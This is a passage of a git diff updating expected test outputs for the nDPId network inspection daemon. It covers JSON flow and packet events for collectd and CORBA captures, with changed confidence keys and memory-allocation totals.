02311{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":78,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":2,"flow_last_seen":1655316161464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1421,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1421,"pkt_l4_len":1387,"thread_ts_msec":1655316161464,"pkt":"AAAAAAAAAAAAAAAACABFAAV\/vHhAAAERCyfAqLIj78BKQpqYZOIFa7JLAhAFYwAEdXNlcoHTTu4jDT4spb1CiaNx+5RTDn8Im\/b94mza+2Tq7cMtskMUVXsMv7dZrJRMmMzbyIK4\/km4yyqNNo6Poo9ByCjRVFMTyyPT\/UT2wKYuzh4+P0AJOUuUlATRprrQzSelw1AlOIvvmScBLdJq7WdxmPSnFa+zKFXMmGiPwTbEIhRIPKuq6S\/J\/VyKO3TxoPwnfcaDGc1KsY1GQLAh8sJqmpR0mYJfLV75vjpe4BcGt05Cnd+IWZgAztagytrBIM67+fRSi+NiaoAAQpWqyiuvWgY+CLskTaKtEF8h9wSZvnYkCvPPKR0QSE7G+pK5ES0eFNWa+1eDOmZkEDc1i9Wj7VXdjo5fJEx2\/3IiiB5UNUGTEeK4mBP6SjM7aEQIBDgv6yGncYgbJv8lkxADwb4mixhSUEWeYIubY\/sjGLQuw+fno\/2V+FW3Or9qBqHt+jO2vbYAxL9De0l+X3mnWnnx9LA9D+EoBhRdQDAU8SwAPcO1nZKxtFVQEmYy4Ev5LD0cRTFUaFM\/TT1FIeO5lYZFNMEjbS0KR0At8kgASX4oE7iy0XJ62uujxcsFMzYaO+OeOclbqIYffC2RUQoXHJqger6nAAImbXnsl0Yu4PPBMgM1eSPtDbfOvyzkhWVDpQqFL0LaOIEfpgSggVDv\/dRk429TrRIFmsQNebxtKbgHn4Xilk2CHRzWTnQD8KPkFiM7RqUaeUcryC+E6juG7jhKTS2dMrdCP03tVnzDWmFRMXGxeDwPJof0pZKwYTbHyjtsI3L9tcxhKGsoD783Ic7IKBLSuy7jdJS1fuIal+iS4AA86NKOIbIz0ec024giNvfBZ575HrChKJmkSP9+nn1UgAEiXNDvy+17p0soQ2LGYrQl0sDFFpGPCX2EXfF25UFPEuMufWJFRn3lIoFaiX7jBeJ5U56cCUIYcD694Kx8BdhTqml2kv7AfwspY+rpzfse8SABjZl8CmbZDe5pG\/2\/G4uMvHE6tBlZKUmIs8c79lUh\/pCUYntjfiF+pjszE+pUzy7FY4DPb+vEcK0xgXO5+0tqMWWVfPzZY8scxbejQR\/4RTVAAwFe3Ax5LD\/us75Xy9NPkHrAZmiG8gUerFYEHE\/M9i5uXtZyc2a08fzqQI\/Eao\/ha4UWXeCRPgKFAupttiZJlo5JGqa8vqGgJPEfEyyylaxzkrdOaUFGxae\/cVO6WvuneM3yJBdYJ8msDBdSJFHRYHjw2OQiK9UbaMSIfdvz7Awe7E2DL\/XyeMKXUeNTlmmM5gyC+pdg1dgvm84WqRyGkpSOQCYFN65RDtXyAefYnqxgbi0O6SqvI17JBkSRrDCeLoSL3NEDK3WWVZ2PcO7jpMhUMF56E\/+HC8STbZE7RMrn2q1cgV+GXyL4ibIgw52TOUUs7qd05Gz\/mi9lHH\/cjJwlNio31+o7dkfGyGyrqz7wUjQZLJq3XWe8CW7UizPU3BncynHVyPZq3+200q8BC+YvCmkLGpGrzc0\/+RWrT+5baFlh\/eIx8nfYhIaDYZFesVK5X4LKsKg6crpIT1EXpf4GdAV277Djc7GYAc9NdQYCDpZfWmEPzTeHXX4IaFXJkBSvrKgylFjgJ\/YrCXjYVM\/7o19QhFgWiV+dbHO8pjEOtvj8B1GsTi\/BKa2wXNb+8mOW9Dh\/9YmdegyUenEoJ4bzIVQ\/5DFAjYNOMTX7CIWFcQV32FgTHjBJ2gFgj22S7oAUJPSo7Vz\/NPjvKSTYKGiPpAiOVtKpLbeA60g7lfqjHStCz9vEIFJC15nxTsveOnho3UiCyRNSbUJKU1ATcf3IBYMl9FCC1+2GCqtOZW0NY1ovxgU="} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} -00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655315734133,"flow_last_seen":1655315868800,"flow_idle_time":200000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1342,"flow_tot_l4_payload_len":22041,"flow_avg_l4_payload_len":1296,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":7,"flow_state":"finished","flow_packets_processed":49,"flow_first_seen":1655315313991,"flow_last_seen":1655315720484,"flow_idle_time":200000,"flow_min_l4_payload_len":151,"flow_max_l4_payload_len":1346,"flow_tot_l4_payload_len":63954,"flow_avg_l4_payload_len":1305,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":35988,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00685{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":8,"flow_state":"finished","flow_packets_processed":17,"flow_first_seen":1655315734133,"flow_last_seen":1655315868800,"flow_idle_time":200000,"flow_min_l4_payload_len":882,"flow_max_l4_payload_len":1342,"flow_tot_l4_payload_len":22041,"flow_avg_l4_payload_len":1296,"midstream":0,"thread_ts_msec":1655316161464,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":36832,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 02320{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_packet_id":3,"flow_last_seen":1655316171464,"flow_idle_time":200000,"pkt_oversize":false,"pkt_caplen":1434,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":1434,"pkt_l4_len":1400,"thread_ts_msec":1655316171464,"pkt":"AAAAAAAAAAAAAAAACABFAAWMwzhAAAERBFrAqLIj78BKQpqYZOIFeLJYAhAFcAAEdXNlcid4w6halbvXS613MX5H51i+nDzaEWkA1VmugP8ABM5xryT\/nH\/vwU2Taojp1kKL2hrGHv0CQBfbLyDZQIw25R5Y7WOAHgQ6IMdV2Q15UvYZZHiZdFDb7AXtZjCHYww\/pZtLpAofcLVJnk+RyLZSqcqADyQ2f46Ho0jVLCz8ioU9SFecatQnEdr43X\/5Al5RG9CIVCm7hvP2jE7HDrP8HsnKwC7MkWWO+h8NZIHYs88z00xAsYnVZJ6iUya5W4VoShVoESpu9tOpgEENAy0y1\/T2ebTBJ8GVq\/9m8TbLNKq9enpKxMosHCvUiEUcsdJF9\/NgXCv425Qb9McHLBVRtkvQ5K5ZuFFub2yn+Muu7vyFIbrl8KnCKB0O0BcJI0E4Ml8gSEuYZi4lHgF64H2JqiFhuQlqEjOR7vcXoE9fITH7IeQHixZ6ByxHOc9cMOLUC1JQmVQqJaSOGLnKxLq9tvIl16Rl\/4TFskTLim1On\/MQ0m0CnBfUvs54FBGtig6jvjePsw5LH5BsN3aQN0ydNYkSxm1BPTHyMbQtIJWT6jw+L0uz1DvQpjzc4RcX7o12T9yXPGTmO7W6BnWLgiIHFmK8TkO5nxY8G89PFe9hR9WrmdFFiLtVQPVJf7ENe6zHG\/2H33iJTJ4WLBh6gAGpUQbmckVksY2eXX7NHoIQFh96dAEzI5Uq7lAAysra8IeGHGeVTOuX0qXUANkBV9MvnXi2Sv1xFNTDS+l+qYURumUgEy9IWQnpwd0YDFPMVMaNE6a4WWC+WR25LgETzjPKh2N4X2C4vH+Sj81sRqfQW4fEJz2SbwyiM4LNTvfzllFIOcETpkT0PNrUJhZ9RkbZcrFuhK5GPnAOOlI93\/6Dy6gL6LHfz0ha2rGej\/yfvsGmiVdtT48gm+maRs\/4BmXetTEhuj1sevyAPjnjkpKPJKIUT26r7UHHLP4ueFCDDP421Dntl\/szsHpYKetXMWMWV6wcodHYjVNSZUoWGtdu7pg06SV69wiC2hi9IfHv8aS2ycQ1KaD3OGcp0uUksh8BkimCFB1hYWbRTUEqzpum0AmXV7qAZtZwDPK+fg8FmayZWTSqSORiCbSXPn3datjeA\/S8P0qOYJvvSK\/Jqnh5OXXe7UJ4+ReS\/Tp5APmi3t2Gf31eqGua0fKEuDgc44bhVUUUGFdftYdcyXnQ0YzAlbdvM3u5hNkJ3Ch+CQaEndN47jNTzhOTvEga6AZ2zgQ4Dyf4GFQPNAw4JGDbYs308hjGafMwkPR8Z9FKuhJ6GoJLzKZV8ys+pcCFLPJbEJHig27gbbKD7ZFre\/nk6mMszf98vHdBDrzqHFjjeEPXz3ejznu8ifYD42gc1YANDtPsgnGU3hA+MSbcLdHUiCGAPF33svO+jzSd6GTY9ejDa2G1BXZw9nTi35b3aYqiH19hqz8yJ7WMPfCBkW4bv9XCKQagsLDMEva9cko3kdccurIqJCjTRDc6SjjtO+4iqLDhC3EKdFmxHpDCfelDkdDcNb1knb4u0aodpInw+qBRqH6L+FOsszUtJ16pCENKJDAG5yRgdTAF\/YSkTW82VRXU8\/985HVLLLM4Zaq1NMYpaN8OogkG7TxqnhPgIY57Fi9+jhIxuy1V1kkomKSycuZXc9ZEAuNCSDWdCaoLSkFZOVx6OEaSJvmSK02QT9RA8ytnVXVgmOqcsgeg9tJprKYtXmF3nYrOqgdi8PX\/bMaAdxzzgX410QIdeFWu\/81QoVE7NTemALBRfg0W0\/HHCndMie3SK3O5RE5HSjup\/JzXQWL5spu8mQXoIPO\/+8d0nrCpsULdDch57rECCbIrYvNQvEneLQwoMVDV"} -00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":81,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655316151465,"flow_last_seen":1655316182371,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1392,"flow_tot_l4_payload_len":6745,"flow_avg_l4_payload_len":1349,"midstream":0,"thread_ts_msec":1655316182371,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} +00693{"flow_event_id":3,"flow_event_name":"idle","thread_id":0,"packet_id":81,"source":"collectd.pcap","alias":"nDPId-test","flow_id":9,"flow_state":"finished","flow_packets_processed":5,"flow_first_seen":1655316151465,"flow_last_seen":1655316182371,"flow_idle_time":200000,"flow_min_l4_payload_len":1232,"flow_max_l4_payload_len":1392,"flow_tot_l4_payload_len":6745,"flow_avg_l4_payload_len":1349,"midstream":0,"thread_ts_msec":1655316182371,"l3_proto":"ip4","src_ip":"192.168.178.35","dst_ip":"239.192.74.66","src_port":39576,"dst_port":25826,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"collectd","breed":"Acceptable","category":"System"}} 00559{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":81,"source":"collectd.pcap","alias":"nDPId-test","packets-captured":81,"packets-processed":81,"total-skipped-flows":0,"total-l4-payload-len":105984,"total-not-detected-flows":0,"total-guessed-flows":3,"total-detected-flows":6,"total-detection-updates":0,"total-updates":4,"current-active-flows":0,"total-active-flows":9,"total-idle-flows":9,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":54,"global_ts_msec":1655316182371} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 81/81 @@ -60,9 +60,9 @@ ~~ total active/idle flows...: 9/9 ~~ total timeout flows.......: 3 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5880188 bytes -~~ total memory freed........: 5880188 bytes -~~ total allocations/frees...: 118224/118224 +~~ total memory allocated....: 6013822 bytes +~~ total memory freed........: 6013822 bytes +~~ total allocations/frees...: 120986/120986 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ ~~ json string min len.......: 464 chars ~~ json string max len.......: 2325 chars diff --git a/test/results/corba.pcap.out b/test/results/corba.pcap.out index 9f97eceae..a3534793b 100644 --- a/test/results/corba.pcap.out +++ b/test/results/corba.pcap.out @@ -4,20 +4,20 @@ 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":4,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":1,"flow_last_seen":1614768020789,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020789,"pkt":"5kBKB+riApXG95NLCABFAAAwnOsAAIAGAAAKZQACCmYAAiIWA4SwjQfnAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00458{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":5,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":2,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020790,"pkt":"ApXG95NL5kBKB+riCABFAAAwnN4AAH8GihsKZgACCmUAAgOEIhawjRxgsI0H6HASgAFEQgAAAgQFtAMDAQA="} 00454{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":6,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_packet_id":3,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020790,"pkt":"5kBKB+riApXG95NLCABFAAAonOwAAIAGAAAKZQACCmYAAiIWA4SwjQfosI0cYVAQgAEU6QAAAAAAAAAA"} -00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00628{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":7,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020789,"flow_last_seen":1614768020790,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":268,"flow_tot_l4_payload_len":268,"flow_avg_l4_payload_len":67,"midstream":0,"thread_ts_msec":1614768020790,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00569{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020792,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020792,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":10,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":1,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020792,"pkt":"5kBKB+riApXG95NLCABFAAAwnO8AAIAGAAAKZQACCmYAAiIXBBmwjThoAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":12,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":2,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020793,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOEAAH8GihgKZgACCmUAAgQZIhewjUFJsI04aXASgAHuQQAAAgQFtAMDAQA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":13,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_packet_id":3,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020793,"pkt":"5kBKB+riApXG95NLCABFAAAonPAAAIAGAAAKZQACCmYAAiIXBBmwjThpsI1BSlAQgAEU6QAAAAAAAAAA"} -00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":14,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020792,"flow_last_seen":1614768020793,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":383,"flow_avg_l4_payload_len":95,"midstream":0,"thread_ts_msec":1614768020793,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00570{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1614768020794,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1614768020794,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":19,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":1,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020794,"pkt":"5kBKB+riApXG95NLCABFAAAwnPQAAIAGAAAKZQACCmYAAiIY7wewjV4NAAAAAHACgAEU8QAAAgQFtAMDAQA="} 00459{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":21,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":2,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":62,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":62,"pkt_l4_len":28,"thread_ts_msec":1614768020795,"pkt":"ApXG95NL5kBKB+riCABFAAAwnOUAAH8GihQKZgACCmUAAu8HIhiwjWV0sI1eDnASgAG5gQAAAgQFtAMDAQA="} 00455{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":22,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_packet_id":3,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"pkt_oversize":false,"pkt_caplen":60,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":60,"pkt_l4_len":20,"thread_ts_msec":1614768020795,"pkt":"5kBKB+riApXG95NLCABFAAAonPUAAIAGAAAKZQACCmYAAiIY7wewjV4OsI1ldVAQgAEU6QAAAAAAAAAA"} -00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} -00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"4":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00631{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":23,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":322,"flow_avg_l4_payload_len":80,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00668{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":1,"flow_state":"finished","flow_packets_processed":7,"flow_first_seen":1614768020789,"flow_last_seen":1614768020792,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":494,"flow_tot_l4_payload_len":762,"flow_avg_l4_payload_len":108,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8726,"dst_port":900,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00670{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":2,"flow_state":"finished","flow_packets_processed":9,"flow_first_seen":1614768020792,"flow_last_seen":1614768020794,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":383,"flow_tot_l4_payload_len":1047,"flow_avg_l4_payload_len":116,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8727,"dst_port":1049,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} +00669{"flow_event_id":2,"flow_event_name":"end","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","flow_id":3,"flow_state":"finished","flow_packets_processed":6,"flow_first_seen":1614768020794,"flow_last_seen":1614768020795,"flow_idle_time":7580000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":322,"flow_tot_l4_payload_len":588,"flow_avg_l4_payload_len":98,"midstream":0,"thread_ts_msec":1614768020795,"l3_proto":"ip4","src_ip":"10.101.0.2","dst_ip":"10.102.0.2","src_port":8728,"dst_port":61191,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3,"ndpi": {"confidence": {"6":"DPI"},"proto":"Corba","breed":"Acceptable","category":"RPC"}} 00554{"daemon_event_id":3,"daemon_event_name":"shutdown","thread_id":0,"packet_id":25,"source":"corba.pcap","alias":"nDPId-test","packets-captured":25,"packets-processed":22,"total-skipped-flows":0,"total-l4-payload-len":2397,"total-not-detected-flows":0,"total-guessed-flows":0,"total-detected-flows":3,"total-detection-updates":0,"total-updates":0,"current-active-flows":0,"total-active-flows":3,"total-idle-flows":3,"total-compressions":0,"total-compression-diff":0,"current-compression-diff":0,"total-events-serialized":21,"global_ts_msec":1614768020795} ~~~~~~~~~~~~~~~~~~~~ SUMMARY ~~~~~~~~~~~~~~~~~~~~ ~~ packets captured/processed: 25/22 @@ -27,9 +27,9 @@ ~~ total active/idle flows...: 3/3 ~~ total timeout flows.......: 0 ~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~ -~~ total memory allocated....: 5878345 bytes -~~ total memory freed........: 5878345 bytes -~~ total allocations/frees...: 118147/118147 +~~ total memory allocated....: 6011979 bytes +~~ total memory freed........: 6011979 bytes +~~ total allocations/frees...: 120909/120909 